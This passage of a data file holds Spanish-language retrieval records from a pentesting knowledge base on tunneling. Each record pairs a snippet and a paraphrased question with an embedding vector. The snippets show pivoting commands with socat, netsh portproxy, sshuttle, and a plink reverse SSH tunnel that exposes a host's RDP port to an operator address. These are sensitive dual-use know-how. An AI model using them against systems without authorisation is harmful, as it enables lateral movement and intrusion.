-0.06783, -0.11348, -0.04223, -0.0232, -0.00803, -0.0034, 0.0569, 0.02578, 0.0963, -0.04878, -0.00307, 0.01175, -0.01986, 0.01253, -0.06915, -0.00722, -0.05946, -0.03807, 0.00453, -0.03071, -0.05102, 0.04188, -0.02187, -0.02963, 0.0507, 0.02119, 0.00865, -0.00032, -0.0748, 0.03643, -0.02161, -0.05192, 0.01375, 0.00245, -0.03713, -0.0342, 0.03038, -0.04235, 0.03743, 0.03521, -0.03529, -0.00242, -0.0061, 0.00896, 0.01411, 0.07261, 0.02175, 0.01942, -0.00522, -0.01085, -0.01682, 0.033, 0.08633, 0.00759, -0.02378, -0.00175, 0.02387, 0.00353, 0.03998, -0.03399, -0.02077, 0.0016, -0.05911, -0.04792, 0.06749, -0.02635, -0.04534, -0.02879, 0.0556, -0.03948, -0.06371, 0.01897, -0.01702]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## socat (redirecciΓ³n simple)\n```bash\nsocat TCP-LISTEN:8080,fork TCP:192.168.5.10:80\n```", "indexar": "quΓ© herramienta sirve para redirigir el puerto 80 a otra direcciΓ³n", "v": [-0.14819, -0.03216, -0.16203, -0.11189, 0.13985, -0.03931, 0.05502, -0.09334, -0.05346, -0.10935, -0.03648, -0.05575, 0.07777, -0.19327, 0.09412, -0.08444, 0.04333, 0.00689, 0.02741, -0.07001, -0.08158, 0.07971, 0.02827, -0.09435, -0.0445, -0.07964, 0.08051, -0.00135, -0.15983, 0.06114, 0.01071, 0.04026, 0.08209, -0.15852, -0.11145, -0.06814, -0.04598, 0.04278, 0.07786, 0.09398, -0.03505, 0.05532, -0.04605, -0.00363, 0.10329, -0.03597, 0.0173, -0.00622, 0.07275, 0.03005, -0.02048, -0.0873, -0.06067, 0.08473, 0.01122, -0.01106, 0.12514, -0.0836, -0.00124, -0.11252, -0.06341, -0.02357, -0.08531, -0.04433, 0.04842, -0.08835, -0.03402, -0.02145, -0.13493, -0.02416, -0.12353, -0.04479, 0.05364, 0.05724, -0.03603, -0.05946, -0.00261, 0.14326, 0.02906, -0.02981, 0.09872, 0.01778, -0.12388, -0.10977, -0.03718, -0.07279, 0.01334, -0.09804, 0.012, -0.1513, -0.0336, -0.01519, -0.02942, 0.11095, -0.01091, 0.02092, -0.00547, 0.03209, -0.02708, -0.01037, 0.14276, 0.00605, -0.08749, -0.0304, 0.00567, 0.05568, -0.08184, -0.11859, -0.03078, 0.01643, 0.09932, 0.0066, 0.03308, -0.03101, -0.03783, 0.03518, -0.09314, -0.10273, 0.02579, -0.04774, -0.01484, -0.06902, -0.01488, -0.02753, -0.03494, -0.01148, 0.03138, 0.15561, 0.01361, -0.09311, 0.02305, -0.05859, -0.09072, 0.01573, 0.06762, -0.01676, 0.04033, -0.07276, -0.07261, -0.03565, -0.01628, 0.09841, -0.01681, -0.1281, 0.0098, -0.01198, 0.0779, -0.03929, -0.01157, -0.01994, -0.01442, 0.00599, 0.0206, 0.06922, -0.00978, 0.02076, 0.0394, 0.00624, -0.11197, -0.01325, -0.03664, -0.06443, -0.02871, 0.01101, 0.04589, -0.07804, -0.0594, 0.00463, 0.09046, 0.01986, -0.03192, 0.04722, -0.01913, -0.0813, 0.00635, -0.10543, -0.08176, -0.04603, -0.01238, -0.07174, -0.0108, -0.01235, -0.06723, -0.05174, 0.00319, -0.03602, -0.05591, -0.00156, 0.04921, 0.06622, -0.01322, -0.00334, -0.03124, -0.10996, -0.03286, 0.08295, -0.0357, -0.07397, 0.01931, 0.02306, 0.00848, 0.0585, 0.01803, -0.04464, 0.01994, 0.11589, -0.07812, -0.00649, -0.04137, 0.05721, 0.02048, -0.0679, 0.03207, 0.00118, -0.04146, -0.0428, 0.00571, 0.03655, 0.0072, 0.07923, -0.00137, -0.01239, 0.00369, 0.0513, -0.00745, 0.0274, -0.00882, 0.00946, 0.04243, 0.00966, 0.01242, -0.01993, -0.02693, -0.01219, 0.01436, -0.06173, 0.00678, 0.0154, -0.06897, -0.07673, 0.02976, -0.00683, -0.02054, 0.00749, -0.00846, -0.03972, -0.00539, 0.00985, -0.07023, -0.06071, -0.01099, -0.0229, 0.03269, -0.00902, -0.01458, -0.05038]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## socat (redirecciΓ³n simple)\n```bash\nsocat TCP-LISTEN:8080,fork TCP:192.168.5.10:80\n```", "indexar": "con quΓ© puedo montar una redirecciΓ³n simple de puertos", "v": [0.01465, 0.05021, -0.09755, -0.03514, -0.07274, 0.03475, 0.16465, -0.02236, -0.14297, -0.18798, -0.08231, 0.04127, 0.13546, -0.0717, 0.0941, 0.01982, 0.0036, 0.06683, 0.03453, -0.03752, -0.02508, -0.13635, -0.05664, -0.07489, 0.14768, 0.13713, 0.10005, -0.04019, -0.08938, 0.05526, -0.04579, 0.13555, 0.08398, 0.03924, -0.01588, -0.13724, 0.04231, 0.04077, 0.05186, -0.00237, -0.01332, -0.00846, -0.0366, 0.03472, 0.00893, -0.05361, 0.00387, -0.12672, 0.05988, 0.03761, 0.08758, 0.01909, -0.13866, -0.04746, -0.08464, 0.03857, 0.07641, 0.05178, -0.01207, -0.04129, 0.0382, 0.13823, -0.01707, 0.0394, 0.01619, -0.03653, -0.05245, 0.08856, -0.08989, 0.0282, -0.04577, -0.06825, -0.04026, 0.11305, -0.00596, 0.02644, -0.00523, -0.01402, 0.0272, 0.09711, 0.01984, 0.01995, -0.04239, -0.01507, 0.05921, -0.07676, -0.07558, -0.12446, 0.01645, -0.14046, 0.06582, -0.06228, 0.11921, 0.0179, -0.02387, -0.09595, -0.00657, 0.11082, -0.06837, 0.01153, -0.07482, 0.08261, -0.03622, 0.10705, 0.03566, -0.01427, 0.0206, -0.04126, 0.09754, -0.0429, 0.11126, -0.01315, -0.05345, -0.02547, -0.06384, -0.10789, 0.00209, -0.02343, -0.05454, -0.00284, -0.01099, -0.00488, 0.00166, -0.00542, 0.0209, -0.04524, 0.10341, 0.13768, -0.02382, -0.00311, 0.03614, -0.04128, -0.06724, -0.14135, -0.04631, -0.00743, -0.02106, -0.12854, -0.0285, -0.0439, -0.05812, 0.012, -0.12686, -0.07991, -0.01891, 0.05141, 0.05332, -0.04719, -0.00771, 0.01187, 0.05237, 0.08449, -0.01479, -0.02574, -0.03925, 0.08333, 0.17667, 0.00398, 0.00652, 0.04248, 0.02397, 0.04147, -0.05961, -0.00782, 0.04454, -0.06657, -0.05408, 0.00629, 0.05842, -0.03868, -0.02458, 0.0944, -0.08869, -0.07667, 0.03458, -0.01168, -0.09833, -0.07822, -0.02751, -0.03161, 0.00291, 0.03846, -0.04746, -0.01121, -0.04776, -0.06176, 0.0238, -0.05185, 0.01183, 0.05284, -0.00879, -0.03374, -0.02643, 0.02299, 0.02363, 0.03665, 0.0151, 0.02102, 0.00832, -0.00321, 0.03161, 0.0054, 0.08159, -0.03622, 0.01894, 0.00823, -0.09897, 0.12475, 0.03296, 0.08659, 0.01202, 0.02871, 0.0227, -0.02762, -0.02648, 0.05201, -0.014, 0.0614, 0.02384, 0.08117, 0.00276, 0.03732, -0.01717, 0.08028, 0.00086, 0.03361, 0.01691, 0.02692, 0.02254, 0.09622, 0.04862, -0.03381, -0.07131, -0.03559, -0.02744, 0.02168, 0.00302, 0.06822, -0.00613, 0.03054, 0.03538, 0.01339, 0.01668, -0.0073, 0.0494, -0.06944, -0.03233, 0.03923, 0.00914, -0.01945, -0.05872, 0.04949, -0.0315, -0.04449, -0.02873, -0.04405]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## socat (redirecciΓ³n simple)\n```bash\nsocat TCP-LISTEN:8080,fork TCP:192.168.5.10:80\n```", "indexar": "cual es la alternativa libre para hacer un proxy TCP bΓ‘sico", "v": [-0.11538, 0.05869, -0.1633, 0.02413, 0.01629, -0.10007, 0.16116, 0.05234, -0.11292, 0.05154, 0.01027, -0.02649, 0.03869, 0.03998, 0.02054, -0.03131, -0.02219, -0.05376, 0.17022, -0.02337, -0.0095, -0.03518, -0.12099, -0.07782, 0.0799, -0.03685, 0.01492, -0.09086, -0.1034, -0.0587, -0.01539, -0.01329, 0.1374, 0.09158, -0.00553, 0.05906, 0.11603, 0.05651, 0.05817, -0.00783, 0.04967, -0.11672, -0.0557, 0.11694, 0.06414, -0.03638, -0.01005, -0.03256, -0.00967, -0.0352, -0.11147, -0.14729, -0.13553, 0.00262, -0.00707, 0.01662, 0.05442, -0.21586, -0.07526, -0.0425, -0.05104, -0.00608, -0.00211, -0.12787, 0.00419, -0.00388, -0.09615, -0.01285, -0.11924, 0.10052, 0.03896, -0.01613, 0.02707, -0.16764, -0.06718, -0.01853, -0.07894, -0.08485, 0.0759, 0.03143, 0.05233, -0.05337, 0.00551, -0.00874, -0.14695, -0.08162, 0.03872, -0.07913, 0.03492, 0.01169, 0.10314, 0.13177, -0.01412, 0.09987, 0.04843, -0.09491, -0.03897, 0.05132, -0.00587, 0.05591, 0.10404, -0.0225, -0.06738, 0.00925, -0.00975, -0.09805, 0.03364, 0.04787, -0.12235, 0.03304, 0.00841, 0.0731, -0.03728, -0.02268, 0.02921, -0.09928, -0.07084, 0.09797, 0.06133, -0.01041, -0.04662, -0.00946, -0.0922, -0.06307, 0.07798, 0.01044, 0.01669, 0.06907, -0.01865, 0.082, 0.08908, -0.02033, -0.08612, -0.13248, -0.13537, -0.01471, 0.09721, -0.08724, -0.03616, -0.0552, 0.02012, 0.03417, -0.03159, -0.01139, 0.0509, 0.00545, 0.07129, 0.00307, 0.02793, -0.01229, -0.05382, -0.02459, -0.06145, 0.09167, -0.01106, -0.03145, -0.0243, -0.09435, 0.02871, 0.07207, 0.05078, -0.0545, -0.0437, -0.04265, -0.00452, -0.04015, -0.00627, -0.02472, -0.04763, -0.01167, 0.01242, 0.05339, 0.0742, -0.07656, 0.03084, -0.05757, -0.05306, -0.10762, -0.01203, -0.02435, 0.07602, -0.02162, -0.09403, -0.02835, 0.01953, -0.03617, 0.01397, 0.03202, 0.02133, 0.07873, -0.08716, 0.02688, -0.07823, -0.04377, 0.00358, -0.05353, 0.02934, -0.14529, 0.00478, 0.00551, -0.01356, -0.06982, 0.01835, -0.04781, -0.00597, -0.04082, 0.01488, 0.03364, 0.02754, 0.07189, 0.04458, -0.01564, 0.04504, 0.01875, -0.03863, 0.06907, 0.00156, -0.00442, -0.02582, -0.01763, -0.01654, -0.00491, 0.00217, 0.05089, -0.01526, -0.00394, 0.0193, 0.00795, 0.01019, 0.02184, 0.0272, 0.01016, 0.04788, -0.00798, 0.01606, 0.02355, -0.03027, 0.05122, 0.01387, 0.01779, 0.05782, 0.04103, -0.04093, 0.01037, 0.00419, 0.02564, -0.04441, 0.00774, -0.00504, -0.05111, -0.00708, 0.01549, 0.01632, 0.01662, 0.00015, 0.03023]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Plink (SSH desde Windows)\n```cmd\nplink.exe -R 3390:127.0.0.1:3389 user@TU_IP\n```", "indexar": "ΒΏquΓ© programa puedo usar para hacer SSH desde Windows?", "v": [-0.17054, 0.01728, -0.09177, -0.03613, 0.00999, -0.14415, -0.10601, -0.27118, -0.01948, -0.03778, -0.10752, -0.05343, -0.02701, -0.15503, -0.13757, 0.03151, 0.0098, -0.06054, 0.00719, 0.10316, 0.04074, -0.05813, -0.03471, -0.00936, -0.07061, 0.05257, 0.09877, -0.01067, -0.08146, -0.04634, -0.0482, 0.00386, 0.03235, -0.05074, 0.01024, 0.02274, 0.02952, 0.03758, 0.16252, 0.07185, 0.06126, 0.07763, -0.02252, 0.00785, 0.14322, 0.01943, 0.10378, -0.08889, -0.01731, 0.03231, -0.02232, 0.03222, -0.04312, -0.01076, 0.07278, -0.06774, 0.08218, -0.15787, -0.08754, 0.01966, 0.01085, 0.06718, -0.00817, 0.05444, 0.00547, -0.10549, 0.07463, 0.01239, -0.01761, 0.11649, -0.07896, 0.00115, 0.04636, 0.02564, -0.00056, 0.10805, -0.06016, -0.06629, 0.09559, -0.07697, -0.03394, 0.05532, 0.06796, -0.00973, -0.03319, -0.0941, 0.02293, -0.03633, 0.0135, -0.13721, -0.01001, 0.01108, -0.0155, 0.07227, 0.0716, -0.10535, 0.01848, -0.01317, 0.01851, 0.05971, 0.01606, -0.11032, -0.02126, 0.11025, -0.04443, 0.03823, 0.05469, -0.05821, -0.09616, 0.0506, 0.00151, 0.00076, -0.12363, -0.02636, -0.1103, 0.04275, 0.00243, -0.09156, 0.00184, 0.03022, -0.08552, 0.05415, -0.11079, -0.00349, 0.11508, -0.0396, 0.00693, 0.14407, -0.16495, 0.09541, 0.04903, 0.01418, -0.01905, -0.08394, -0.08742, -0.02202, 0.03465, -0.03493, 0.07054, -0.05281, 0.0821, 0.0377, 0.0402, 0.02029, -0.01536, -0.00716, 0.02395, -0.01679, -0.04304, -0.00609, 0.13084, -0.0225, -0.03363, 0.01813, -0.0091, -0.00135, 0.07883, 0.04892, -0.00593, 0.00657, -0.07402, -0.01379, -0.01629, -0.03404, 0.10706, -0.01914, 0.00537, 0.02682, 0.01803, 0.05549, 0.02735, 0.10088, 0.03619, -0.06186, 0.04172, -0.04081, 0.0178, -0.02967, -0.03192, -0.00924, -0.09137, 0.04355, 0.05191, -0.00941, 0.03104, 0.04664, -0.00431, 0.07352, -0.03043, -0.00106, -0.11095, 0.02838, 0.08241, -0.03006, 0.00179, 0.00943, 0.02821, -0.00839, 0.03849, -0.01291, -0.06842, 0.00323, -0.05399, -0.03514, 0.11687, 0.06626, -0.06892, 0.01131, 0.10737, 0.08622, -0.02151, -0.02172, 0.0398, 0.00168, -0.02651, -0.04839, -0.03233, 0.03838, 0.05235, -0.0011, -0.01558, 0.02124, 0.00683, 0.06666, 0.00447, -0.07081, -0.05262, 0.00515, 0.0, 0.00749, 0.0183, -0.00185, 0.06018, -0.02281, -0.00287, -0.01994, -0.03764, -0.0229, -0.01248, -0.00774, -0.09081, 0.06036, -0.00725, -0.02062, -0.05188, 0.01055, -0.02595, 0.00489, -0.011, -0.01291, 0.01716, 0.00953, 0.02116, -0.01759, -0.01482, 0.11949]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Plink (SSH desde Windows)\n```cmd\nplink.exe -R 3390:127.0.0.1:3389 user@TU_IP\n```", "indexar": "ΒΏhay alguna herramienta que permita conectarse por RDP a travΓ©s de SSH en Windows?", "v": [-0.06682, 0.08069, -0.13905, -0.14296, 0.08306, -0.10616, -0.07064, -0.14734, 0.03258, 0.01449, -0.05113, -0.04812, 0.00853, -0.2378, -0.03347, 0.05466, -0.08368, 0.01262, -0.08701, 0.01251, 0.04303, -0.01209, -0.14751, 0.045, -0.03128, -0.07942, 0.09611, 0.0168, -0.19959, 0.01159, 0.0789, -0.02539, -0.03516, -0.02379, -0.0634, -0.06658, -0.00948, 0.11967, 0.1954, 0.0061, 0.03985, 0.0417, -0.01708, 0.14087, 0.12648, 0.01896, -0.02697, -0.05978, 0.0555, 0.08764, -0.1579, -0.01151, -0.18576, 0.00996, 0.02743, -0.04082, 0.21141, -0.03925, 0.0355, -0.07031, -0.08687, 0.12211, -0.0918, -0.03935, -0.01152, -0.04591, 0.01927, -0.091, -0.08628, 0.2122, -0.09122, -0.01477, 0.02936, 0.00141, 0.04758, 0.01052, -0.03478, -0.01338, 0.11653, -0.03115, 0.04092, -0.04312, -0.0154, 0.01076, -0.07174, -0.08608, 0.11094, 0.00319, 0.06876, -0.12236, -0.03278, 0.00501, -0.04302, 0.05023, 0.01718, -0.08291, -0.03023, -0.08315, 0.00214, 0.05065, 0.04674, -0.04512, -0.05687, 0.05894, -0.0857, -0.00981, 0.01947, -0.05435, -0.03636, 0.06653, 0.03759, 0.07232, -0.01584, -0.02174, -0.0385, 0.01038, -0.02589, -0.10657, -0.05385, -0.05609, -0.03373, 0.03987, -0.08583, -0.041, -0.01848, 0.02452, -0.06047, 0.09438, -0.05696, 0.01545, 0.07077, 0.01277, -0.06153, -0.05758, -0.04438, 0.00063, 0.03327, -0.09109, 0.06427, -0.09142, 0.02493, 0.03595, 0.05911, -0.07617, 0.0085, 0.01674, 0.0043, -0.03208, -0.09728, 0.00745, 0.04339, -0.03136, -0.0507, 0.01773, 0.01223, 0.07451, 0.00542, 0.04419, -0.00914, 0.02883, -0.08068, -0.02819, 0.0104, -0.03812, 0.01018, -0.03486, -0.0361, 0.06437, 0.06454, 0.02464, -0.00196, 0.02249, 0.03512, 0.00581, -0.02623, -0.07856, -0.0197, -0.02996, -0.01226, -0.02971, -0.0735, -0.0023, 0.02223, -0.05182, 0.00361, 0.04894, -0.01967, 0.0182, -0.02318, 0.00193, -0.04, 0.01076, 0.01027, -0.04404, 0.01273, -0.0156, -0.02443, -0.07935, 0.09495, 0.04723, -0.09181, -0.01364, -0.06145, -0.05823, 0.07322, 0.0706, -0.01833, 0.02843, 0.00753, 0.01901, 0.08267, 0.00225, 0.03513, -0.08755, -0.01041, -0.07951, 0.0152, 0.02081, 0.00818, 0.02483, 0.01645, 0.00306, 0.01817, 0.00654, 0.00066, -0.02335, -0.02997, 0.02912, 0.02929, -0.06028, 0.02026, -0.01901, 0.03321, -0.02588, 0.02225, -0.01231, 0.0243, -0.03536, -0.06885, -0.00148, -0.01219, 0.03171, 0.0303, -0.03971, -0.02327, -0.01293, -0.04395, 0.00165, 0.0121, -0.08196, 0.01323, 5e-05, 0.03002, -0.012, 0.02195, 0.02794]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## sshuttle (VPN improvisada, lo mΓ‘s cΓ³modo)\n```bash\nsshuttle -r user@pivot 192.168.5.0/24 --dns\n```", "indexar": "ΒΏQuΓ© programa improvisa una VPN de forma cΓ³moda?", "v": [-0.01723, 0.03362, -0.15207, -0.09866, 0.14325, -0.03933, 0.1459, -0.12422, 0.02321, -0.203, 0.17435, -0.07599, 0.01103, 0.00518, -0.15131, 0.13989, 0.07324, -0.06389, 0.18705, 0.18613, -0.06726, -0.10287, -0.14945, 0.00642, 0.00505, 0.01941, 0.06303, 0.06487, -0.04429, -0.1331, -0.10746, -0.01732, 0.02874, -0.0045, -0.09133, -0.00359, 0.05333, 0.10441, 0.03042, 0.01963, 0.02107, 0.02081, 0.1026, 0.00833, 0.09631, 0.00897, 0.00315, -0.01205, -0.05202, 0.02414, -0.11911, 0.07146, 0.07344, 0.00267, 0.0942, -0.05266, -0.03735, -0.21577, 0.04577, 0.04108, -0.1006, -0.0844, 0.03643, -0.00985, 0.06122, 0.02432, -0.05265, -0.06797, -0.07266, -0.03568, -0.01407, -0.05397, -0.05478, 0.04901, -0.00265, -0.01192, -0.12211, -0.13126, 0.09525, 0.02141, 0.02999, -0.01877, 0.01086, 0.00744, -0.10099, 0.00067, 0.04285, 0.01666, -0.04476, -0.03842, 0.02798, 0.01285, 0.0707, 0.06934, 0.07392, -0.10341, 0.08261, 0.07751, 0.03897, -0.03827, 0.04312, 0.01363, -0.13822, 0.05478, -0.04388, 0.08779, 0.02613, 0.04128, -0.03523, 0.03757, 0.08136, 0.08278, -0.06934, 0.0086, -0.04009, -0.02613, -0.01602, -0.02911, 0.06593, -0.04193, -0.03041, 0.00974, -0.0343, -0.03267, 0.09651, 0.02447, -0.00925, 0.19472, 0.01104, 0.10689, 0.07136, 0.01235, 0.00753, -0.05615, -0.01873, -0.06832, 0.0951, -0.03207, -0.01237, -0.07524, 0.02988, 0.04176, 0.03484, 0.0101, -0.00691, -0.03911, 0.04549, -0.08267, -0.01036, 0.05539, -0.01959, 0.03134, -0.02233, -0.01394, -0.05118, 0.04054, -0.0047, -0.05788, -0.06891, 0.07581, -0.00552, 0.00506, 0.00337, -0.07574, 0.06966, -0.03064, 0.00095, -0.01513, 0.03192, 0.03701, -0.03595, 0.05981, 0.03768, -0.03714, -0.0826, -0.02383, -0.02473, -0.07259, 0.03305, 0.04072, -0.03136, 0.04345, 0.04523, -0.01163, 0.05243, -0.04638, 0.04723, 0.02153, 0.03066, -0.01119, -0.06084, -0.01999, -0.0383, -0.00189, -0.07198, -0.01654, -0.01348, -0.03734, -0.01574, 0.00488, -0.03057, -0.02943, 0.02318, -0.01887, 0.00152, 0.04582, -0.09194, -0.00073, 0.01887, 0.05281, 0.00126, -0.06472, 0.03948, -0.00948, -0.00377, 0.01705, -0.0442, -0.00556, 0.04819, -0.01634, -0.04514, 0.06723, 0.0201, 0.0248, -0.00037, -0.0544, 0.04131, 0.07309, -0.0106, 0.04126, -0.05408, -0.0158, 0.01925, -0.07246, 0.04882, -0.01391, 0.01366, -0.0303, 0.00577, -0.0329, 0.01392, 0.08337, 0.00743, -0.03292, 0.01496, -0.0095, -0.02171, 0.05467, -0.06479, -0.01938, 0.00313, 0.01305, 0.0674, -0.0305, 0.04027, 0.02896]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## sshuttle (VPN improvisada, lo mΓ‘s cΓ³modo)\n```bash\nsshuttle -r user@pivot 192.168.5.0/24 --dns\n```", "indexar": "Con quΓ© puedo montar un tΓΊnel VPN simple usando SSH?", "v": [0.00809, -0.02484, -0.28624, -0.08401, -0.06553, 0.04581, -0.01087, -0.19335, 0.08339, -0.0513, -0.01287, 0.00891, 0.05676, 0.05274, -0.15117, 0.15535, -0.04437, -0.16282, 0.23033, 0.12844, -0.08774, -0.18816, -0.06942, -0.04888, 0.04354, 0.09127, 0.03098, -0.0615, -0.08438, -0.16104, 0.01031, 0.04261, 0.07324, 0.09954, -0.07608, -0.00703, -0.01344, 0.17378, 0.06188, 0.01134, -0.01587, -0.03337, -0.06221, 0.0487, 0.01262, -0.04264, -0.01149, -0.09166, -0.02974, -0.02397, 0.00266, 0.02901, -0.1946, -0.01659, 0.03476, 0.02944, 0.09552, -0.07074, 0.08339, -0.0425, -0.0159, -0.04073, 0.03997, 0.10173, 0.03036, -0.0322, -0.02652, 0.02739, -0.13025, -0.06205, -0.07677, -0.02913, -0.02171, 0.08952, 0.00246, 0.0447, -0.03211, 0.01539, 0.10049, 0.10771, 0.01861, -0.0195, 0.01119, -0.00656, -0.08227, 0.01532, -0.08374, -0.0295, 0.05873, -0.05122, -0.08744, 0.00868, 0.08933, 0.04928, 0.09714, -0.04261, -0.02784, 0.07982, 0.02225, -0.03166, 0.0106, 0.06266, -0.09257, 0.16575, 0.04719, 0.01948, -0.00444, -0.09149, 0.03537, 0.00182, 0.06256, 0.11901, -0.08261, -0.03667, -0.09894, -0.07521, -0.0363, 0.00219, -0.02517, -0.06159, -0.01601, -0.03423, -0.0144, -0.00394, 0.01874, -0.04438, 0.0374, 0.15704, 0.02015, 0.03433, 0.02518, 0.01488, -0.03722, -0.03925, 0.03196, 0.03233, 0.03398, -0.02775, 0.01053, -0.02055, 0.04994, -0.05234, -0.00646, -0.06898, 0.03642, 0.00255, -0.00413, -0.18038, 0.00724, 0.00767, 0.05829, -0.01828, -0.01524, -0.0325, -0.0009, -0.01876, 0.02812, -0.06372, -0.00054, 0.11646, 0.0358, 0.00242, -0.02248, -0.03516, 0.01446, -0.02004, -0.04822, -0.03749, 0.02092, 0.01233, -0.00337, 0.03161, 0.02936, -0.02464, 0.01255, -0.06277, -0.0073, -0.02556, 0.03956, 0.02648, -0.00688, -0.08019, -0.00174, 0.08441, -0.00923, -0.01628, 0.06376, -0.03805, 0.04858, 0.00501, -0.01713, 0.01155, -0.00991, -0.00599, -0.03074, -0.04941, 0.03849, -0.07555, 0.04676, -0.06863, -0.03563, 0.00077, 0.02567, -0.05638, 0.01351, -0.02907, -0.05889, 0.00241, 0.02807, 0.062, 0.08275, -0.0551, -0.01423, -0.03381, 0.04175, 0.05975, 0.00429, 0.02304, -0.02888, -0.00364, -0.01756, 0.05963, -0.02311, -0.00223, -0.03058, 0.00545, -0.00201, 0.03489, -0.04051, 0.02515, -0.03868, 0.02609, -0.03266, -0.04752, 0.05728, 0.00922, -0.03329, 0.03419, 0.00877, 0.0082, -0.00129, 0.03233, 0.0039, 0.02293, -0.02673, -0.00979, -0.00916, 0.05721, -0.02821, -0.04979, 0.01174, 0.0175, -0.02029, -0.03074, 0.00062, -0.01052]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## sshuttle (VPN improvisada, lo mΓ‘s cΓ³modo)\n```bash\nsshuttle -r user@pivot 192.168.5.0/24 --dns\n```", "indexar": "ΒΏCuΓ‘l es una alternativa libre y cΓ³moda para crear una VPN?", "v": [-0.09098, 0.05051, -0.12642, -0.04452, 0.00704, -0.00584, 0.05921, -0.15393, 0.0346, -0.25195, 0.09389, -0.21511, -0.04894, 0.02084, -0.10525, 0.06204, -0.00855, -0.11999, 0.25279, 0.17771, -0.05803, -0.1349, -0.11304, -0.03467, 0.01447, -0.00732, 0.12708, 0.04984, -0.12153, -0.04434, -0.00796, 0.01508, -0.02606, 0.07311, -0.04503, 0.04676, 0.14611, 0.13423, 0.04121, -0.0226, 0.02951, 0.00497, 0.06878, 0.08548, 0.00167, 0.00634, -0.04719, 0.04795, -0.00965, 0.06844, -0.09259, 0.05985, -0.07937, 0.04862, 0.11114, 0.02357, 0.0849, -0.17819, 0.03499, -0.02864, -0.16478, -0.02997, 0.04302, 0.00782, -0.01176, -0.01616, -0.11914, -0.01253, -0.08654, 0.06225, 0.0201, -0.0805, -0.04112, 0.03553, 0.01483, 0.02329, -0.08427, -0.05712, 0.0323, 0.09603, 0.12969, -0.051, -0.0164, -0.05003, -0.0633, -0.02585, 0.04835, -0.00935, 0.01463, -0.01557, 0.0187, -0.01274, 0.0557, 0.04064, 0.01254, -0.05995, -0.00576, 0.04275, 0.02317, 0.01149, 0.03324, 0.03823, -0.09058, 0.04178, -0.00211, -0.03985, -0.04405, 0.00797, -0.04998, 0.01477, 0.05296, 0.09011, -0.04924, 0.0091, -0.04248, -0.06566, -0.05417, 0.01338, 0.03181, 0.0106, -0.03744, -0.03004, -0.062, -0.07992, 0.03877, 0.02185, 0.00857, 0.10278, -0.03843, 0.09108, 0.04923, -0.04388, -0.07036, -0.07293, -0.07745, 0.00967, 0.09777, -0.04281, 0.00957, -0.0497, 0.02926, 0.0069, -0.00462, -0.02483, 0.00168, -0.0491, 0.02599, -0.0913, 0.00111, 0.00673, -0.02499, -0.00232, -0.01545, 0.01745, -0.07629, 0.08502, -0.04249, -0.08355, -0.04541, 0.12928, 0.07047, -0.00976, -0.00496, -0.06106, 0.02104, -0.01304, -0.02869, -0.04059, -0.02654, 0.04095, -0.03803, 0.06639, 0.03895, -0.09446, -0.0124, -0.05759, 0.02391, -0.08849, -0.00023, 0.00211, 0.0063, -0.00399, -0.07827, -0.00582, 0.03657, -0.05373, 0.0792, -0.00068, 0.02511, 0.04044, -0.04412, 0.02057, -0.04496, -0.01534, -0.04959, -0.04888, 0.02609, -0.12948, -0.01618, -0.01237, -0.03811, -0.01789, -0.00784, -0.02201, -0.02737, -0.02539, -0.07947, 0.04071, 0.0055, 0.02601, 0.03373, -0.02522, 0.0527, -0.03138, -0.02207, 0.02081, 0.00031, -0.03719, 0.03566, -0.072, 0.00022, 0.10068, -0.02668, -0.01538, 0.01427, 0.00857, 0.03907, 0.06562, -0.03076, 0.03284, -0.01571, 0.0174, 0.00056, -0.04532, 0.04339, 0.00417, 0.01994, 0.00825, 0.01195, 0.0245, 0.03527, 0.08104, -0.01885, 0.00273, 0.0167, -0.01907, -0.04385, 0.06677, -0.09796, -0.08745, -0.04163, -0.00074, 0.06232, 0.02257, 0.03249, 0.02344]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows nativo β€” netsh portproxy\n```cmd\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80\n```", "indexar": "que programa hay para cambiar puertos de entrada en Windows sin instalar nada extra?", "v": [0.0332, 0.09018, -0.14944, -0.16736, 0.0249, -0.06432, 0.03487, -0.12053, -0.13737, -0.09478, -0.03788, -0.05696, 0.00869, -0.10515, -0.08771, -0.06563, 0.00935, -0.05214, 0.1388, 0.03671, -0.08035, 0.00311, -0.00167, -0.08244, 0.01688, 0.08626, -0.06693, -0.00224, -0.10565, -0.02438, 0.00409, -0.01698, 0.09287, -0.01966, 0.01926, -0.06984, 0.06944, -0.0144, 0.18279, 0.04367, 0.12633, 0.11992, 0.06087, 0.10307, 0.09909, -0.10693, 0.11845, -0.06099, 0.12173, -0.05057, 0.01273, 0.06088, 0.02626, -0.07597, 0.09702, -0.07581, 0.04009, -0.0714, -0.07556, -0.01391, -0.02164, 0.23403, -0.06691, 0.03644, 0.03738, 0.0124, 0.00607, 0.05633, -0.04059, 0.14228, -0.10257, -0.0722, 0.06424, -0.01051, 